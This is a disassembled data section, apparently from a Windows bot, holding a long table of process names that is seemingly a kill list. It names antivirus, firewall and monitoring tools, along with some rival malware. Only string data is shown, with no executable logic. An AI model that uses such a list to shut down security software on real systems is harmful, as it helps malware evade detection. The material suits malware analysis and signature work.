dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: sub_4088B4+EC�o
; .data:004228C4�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:004228C0�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:004228BC�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:004228B8�o
align 10h
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:004228B4�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:004228B0�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:004228AC�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:004228A8�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:004228A4�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:004228A0�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0042289C�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:00422898�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:00422894�o
align 4
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .data:00422890�o
align 4
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .data:0042288C�o
align 4
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .data:00422888�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .data:00422884�o
align 10h
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .data:00422880�o
align 4
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .data:0042287C�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .data:00422878�o
align 4
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .data:00422874�o
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .data:00422870�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .data:0042286C�o
align 4
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .data:00422868�o
align 4
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .data:00422864�o
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .data:00422860�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .data:0042285C�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .data:00422858�o
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .data:00422854�o
align 4
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .data:00422850�o
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .data:0042284C�o
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .data:00422848�o
align 4
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .data:00422844�o
aWinupdate_exe db 'WINUPDATE.EXE',0 ; DATA XREF: .data:00422840�o
align 10h
aWintsk32_exe db 'WINTSK32.EXE',0 ; DATA XREF: .data:0042283C�o
align 10h
aWinstart001_ex db 'WINSTART001.EXE',0 ; DATA XREF: .data:00422838�o
aWinstart_exe db 'WINSTART.EXE',0 ; DATA XREF: .data:00422834�o
align 10h
aWinssk32_exe db 'WINSSK32.EXE',0 ; DATA XREF: .data:00422830�o
align 10h
aWinservn_exe db 'WINSERVN.EXE',0 ; DATA XREF: .data:0042282C�o
align 10h
aWinrecon_exe db 'WINRECON.EXE',0 ; DATA XREF: .data:00422828�o
align 10h
aWinppr32_exe db 'WINPPR32.EXE',0 ; DATA XREF: .data:00422824�o
align 10h
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .data:00422820�o
align 4
aWinmain_exe db 'WINMAIN.EXE',0 ; DATA XREF: .data:0042281C�o
aWinlogin_exe db 'WINLOGIN.EXE',0 ; DATA XREF: .data:00422818�o
align 4
aWininitx_exe db 'WININITX.EXE',0 ; DATA XREF: .data:00422814�o
align 4
aWininit_exe db 'WININIT.EXE',0 ; DATA XREF: .data:00422810�o
aWininetd_exe db 'WININETD.EXE',0 ; DATA XREF: .data:0042280C�o
align 4
aWindows_exe db 'WINDOWS.EXE',0 ; DATA XREF: .data:00422808�o
aWindow_exe db 'WINDOW.EXE',0 ; DATA XREF: .data:00422804�o
align 4
aWinactive_exe db 'WINACTIVE.EXE',0 ; DATA XREF: .data:00422800�o
align 4
aWin32us_exe db 'WIN32US.EXE',0 ; DATA XREF: .data:004227FC�o
aWin32_exe db 'WIN32.EXE',0 ; DATA XREF: .data:004227F8�o
align 4
aWinBugsfix_exe db 'WIN-BUGSFIX.EXE',0 ; DATA XREF: .data:004227F4�o
aWimmun32_exe db 'WIMMUN32.EXE',0 ; DATA XREF: .data:004227F0�o
align 4
aWhoswatchingme db 'WHOSWATCHINGME.EXE',0 ; DATA XREF: .data:004227EC�o
align 4
aWgfe95_exe db 'WGFE95.EXE',0 ; DATA XREF: .data:004227E8�o
align 4
aWfindv32_exe db 'WFINDV32.EXE',0 ; DATA XREF: .data:004227E4�o
align 4
aWebtrap_exe db 'WEBTRAP.EXE',0 ; DATA XREF: .data:004227E0�o
aWebscanx_exe db 'WEBSCANX.EXE',0 ; DATA XREF: .data:004227DC�o
align 10h
aWebdav_exe db 'WEBDAV.EXE',0 ; DATA XREF: .data:004227D8�o
align 4
aWatchdog_exe db 'WATCHDOG.EXE',0 ; DATA XREF: .data:004227D4�o
align 4
aW9x_exe db 'W9X.EXE',0 ; DATA XREF: .data:004227D0�o
aW32dsm89_exe db 'W32DSM89.EXE',0 ; DATA XREF: .data:004227CC�o
align 4
aVswinperse_exe db 'VSWINPERSE.EXE',0 ; DATA XREF: .data:004227C8�o
align 4
aVswinntse_exe db 'VSWINNTSE.EXE',0 ; DATA XREF: .data:004227C4�o
align 4
aVswin9xe_exe db 'VSWIN9XE.EXE',0 ; DATA XREF: .data:004227C0�o
align 4
aVsstat_exe db 'VSSTAT.EXE',0 ; DATA XREF: .data:004227BC�o
align 10h
aVsmon_exe db 'VSMON.EXE',0 ; DATA XREF: .data:004227B8�o
align 4
aVsmain_exe db 'VSMAIN.EXE',0 ; DATA XREF: .data:004227B4�o
align 4
aVsisetup_exe db 'VSISETUP.EXE',0 ; DATA XREF: .data:004227B0�o
align 4
aVshwin32_exe db 'VSHWIN32.EXE',0 ; DATA XREF: .data:004227AC�o
align 4
aVsecomr_exe db 'VSECOMR.EXE',0 ; DATA XREF: .data:004227A8�o
aVsched_exe db 'VSCHED.EXE',0 ; DATA XREF: .data:004227A4�o
align 10h
aVscenu6_02d30_ db 'VSCENU6.02D30.EXE',0 ; DATA XREF: .data:004227A0�o
align 4
aVscan40_exe db 'VSCAN40.EXE',0 ; DATA XREF: .data:0042279C�o
aVptray_exe db 'VPTRAY.EXE',0 ; DATA XREF: .data:00422798�o
align 4
aVpfw30s_exe db 'VPFW30S.EXE',0 ; DATA XREF: .data:00422794�o
aVpc42_exe db 'VPC42.EXE',0 ; DATA XREF: .data:00422790�o
align 4
aVpc32_exe db 'VPC32.EXE',0 ; DATA XREF: .data:0042278C�o
align 10h
aVnpc3000_exe db 'VNPC3000.EXE',0 ; DATA XREF: .data:00422788�o
align 10h
aVnlan300_exe db 'VNLAN300.EXE',0 ; DATA XREF: .data:00422784�o
align 10h
aVirusmdpersona db 'VIRUSMDPERSONALFIREWALL.EXE',0 ; DATA XREF: .data:00422780�o
aVirHelp_exe db 'VIR-HELP.EXE',0 ; DATA XREF: .data:0042277C�o
align 4
aVfsetup_exe db 'VFSETUP.EXE',0 ; DATA XREF: .data:00422778�o
aVettray_exe db 'VETTRAY.EXE',0 ; DATA XREF: .data:00422774�o
aVet95_exe db 'VET95.EXE',0 ; DATA XREF: .data:00422770�o
align 10h
aVet32_exe db 'VET32.EXE',0 ; DATA XREF: .data:0042276C�o
align 4
aVcsetup_exe db 'VCSETUP.EXE',0 ; DATA XREF: .data:00422768�o
aVbwinntw_exe db 'VBWINNTW.EXE',0 ; DATA XREF: .data:00422764�o
align 4
aVbwin9x_exe db 'VBWIN9X.EXE',0 ; DATA XREF: .data:00422760�o
aVbust_exe db 'VBUST.EXE',0 ; DATA XREF: .data:0042275C�o
align 10h
aVbcons_exe db 'VBCONS.EXE',0 ; DATA XREF: .data:00422758�o
align 4
aVbcmserv_exe db 'VBCMSERV.EXE',0 ; DATA XREF: .data:00422754�o
align 4
aUtpost_exe db 'UTPOST.EXE',0 ; DATA XREF: .data:00422750�o
align 4
aUpgrad_exe db 'UPGRAD.EXE',0 ; DATA XREF: .data:0042274C�o
align 4
aUpdate_exe db 'UPDATE.EXE',0 ; DATA XREF: .data:00422744�o
; .data:00422748�o
align 10h
aUpdat_exe db 'UPDAT.EXE',0 ; DATA XREF: .data:00422740�o
align 4
aUndoboot_exe db 'UNDOBOOT.EXE',0 ; DATA XREF: .data:0042273C�o
align 4
aTvtmd_exe db 'TVTMD.EXE',0 ; DATA XREF: .data:00422738�o
align 4
aTvmd_exe db 'TVMD.EXE',0 ; DATA XREF: .data:00422734�o
align 4
aTsadbot_exe db 'TSADBOT.EXE',0 ; DATA XREF: .data:00422730�o
aTrojantrap3_ex db 'TROJANTRAP3.EXE',0 ; DATA XREF: .data:0042272C�o
aTrjsetup_exe db 'TRJSETUP.EXE',0 ; DATA XREF: .data:00422728�o
align 10h
aTrjscan_exe db 'TRJSCAN.EXE',0 ; DATA XREF: .data:00422724�o
aTrickler_exe db 'TRICKLER.EXE',0 ; DATA XREF: .data:00422720�o
align 4
aTracert_exe db 'TRACERT.EXE',0 ; DATA XREF: .data:0042271C�o
aTitaninxp_exe db 'TITANINXP.EXE',0 ; DATA XREF: .data:00422718�o
align 4
aTitanin_exe db 'TITANIN.EXE',0 ; DATA XREF: .data:00422714�o
aTgbob_exe db 'TGBOB.EXE',0 ; DATA XREF: .data:00422710�o
align 10h
aTfak5_exe db 'TFAK5.EXE',0 ; DATA XREF: .data:0042270C�o
align 4
aTfak_exe db 'TFAK.EXE',0 ; DATA XREF: .data:00422708�o
align 4
aTeekids_exe db 'TEEKIDS.EXE',0 ; DATA XREF: .data:00422704�o
aTds2Nt_exe db 'TDS2-NT.EXE',0 ; DATA XREF: .data:00422700�o
aTds298_exe db 'TDS2-98.EXE',0 ; DATA XREF: .data:004226FC�o
aTds3_exe db 'TDS-3.EXE',0 ; DATA XREF: .data:004226F8�o
align 4
aTcm_exe db 'TCM.EXE',0 ; DATA XREF: .data:004226F4�o
aTca_exe db 'TCA.EXE',0 ; DATA XREF: .data:004226F0�o
aTc_exe db 'TC.EXE',0 ; DATA XREF: .data:004226EC�o
align 10h
aTbscan_exe db 'TBSCAN.EXE',0 ; DATA XREF: .data:004226E8�o
align 4
aTaumon_exe db 'TAUMON.EXE',0 ; DATA XREF: .data:004226E4�o
align 4
aTaskmon_exe db 'TASKMON.EXE',0 ; DATA XREF: .data:004226E0�o
aTaskmo_exe db 'TASKMO.EXE',0 ; DATA XREF: .data:004226DC�o
align 10h
aTaskmg_exe db 'TASKMG.EXE',0 ; DATA XREF: .data:004226D8�o
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .data:004226D4�o
align 4
aSystem32_exe db 'SYSTEM32.EXE',0 ; DATA XREF: .data:004226D0�o
align 4
aSystem_exe db 'SYSTEM.EXE',0 ; DATA XREF: .data:004226CC�o
align 4
aSysedit_exe db 'SYSEDIT.EXE',0 ; DATA XREF: .data:004226C8�o
aSymtray_exe db 'SYMTRAY.EXE',0 ; DATA XREF: .data:004226C4�o
aSymproxysvc_ex db 'SYMPROXYSVC.EXE',0 ; DATA XREF: .data:004226C0�o
aSweepnet_sweep db 'SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE',0 ; DATA XREF: .data:004226BC�o
align 10h
aSweep95_exe db 'SWEEP95.EXE',0 ; DATA XREF: .data:004226B8�o
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .data:004226B4�o
aSvchosts_exe db 'SVCHOSTS.EXE',0 ; DATA XREF: .data:004226B0�o
align 4
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .data:004226AC�o
align 4
aSvc_exe db 'SVC.EXE',0 ; DATA XREF: .data:004226A8�o
aSupporter5_exe db 'SUPPORTER5.EXE',0 ; DATA XREF: .data:004226A4�o
align 10h
aSupport_exe db 'SUPPORT.EXE',0 ; DATA XREF: .data:004226A0�o
aSupftrl_exe db 'SUPFTRL.EXE',0 ; DATA XREF: .data:0042269C�o
aStcloader_exe db 'STCLOADER.EXE',0 ; DATA XREF: .data:00422698�o
align 4
aStart_exe db 'START.EXE',0 ; DATA XREF: .data:00422694�o
align 4
aSt2_exe db 'ST2.EXE',0 ; DATA XREF: .data:00422690�o
aSsg_4104_exe db 'SSG_4104.EXE',0 ; DATA XREF: .data:0042268C�o
align 4
aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .data:00422688�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .data:00422684�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .data:00422680�o
align 10h
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .data:0042267C�o
align 4
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .data:00422678�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .data:00422674�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .data:00422670�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .data:0042266C�o
align 10h
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .data:00422668�o
align 4
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .data:00422664�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .data:00422660�o
align 10h
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .data:0042265C�o
align 4
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .data:00422658�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .data:00422654�o
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .data:00422650�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .data:0042264C�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .data:00422648�o
align 4
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .data:00422644�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .data:00422640�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: .data:0042263C�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .data:00422638�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .data:00422634�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .data:00422630�o
align 4
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .data:0042262C�o
align 10h
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .data:00422628�o
align 10h
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .data:00422624�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .data:00422620�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .data:0042261C�o
align 4
aSd_exe db 'SD.EXE',0 ; DATA XREF: .data:00422618�o
align 4
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .data:00422614�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .data:00422610�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .data:0042260C�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .data:00422608�o
align 4
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .data:00422604�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .data:00422600�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .data:004225FC�o
align 10h
aSc_exe db 'SC.EXE',0 ; DATA XREF: .data:004225F8�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .data:004225F4�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .data:004225F0�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .data:004225EC�o
align 4
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .data:004225E8�o
align 4
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .data:004225E4�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .data:004225E0�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .data:004225DC�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .data:004225D8�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .data:004225D4�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .data:004225D0�o
align 4
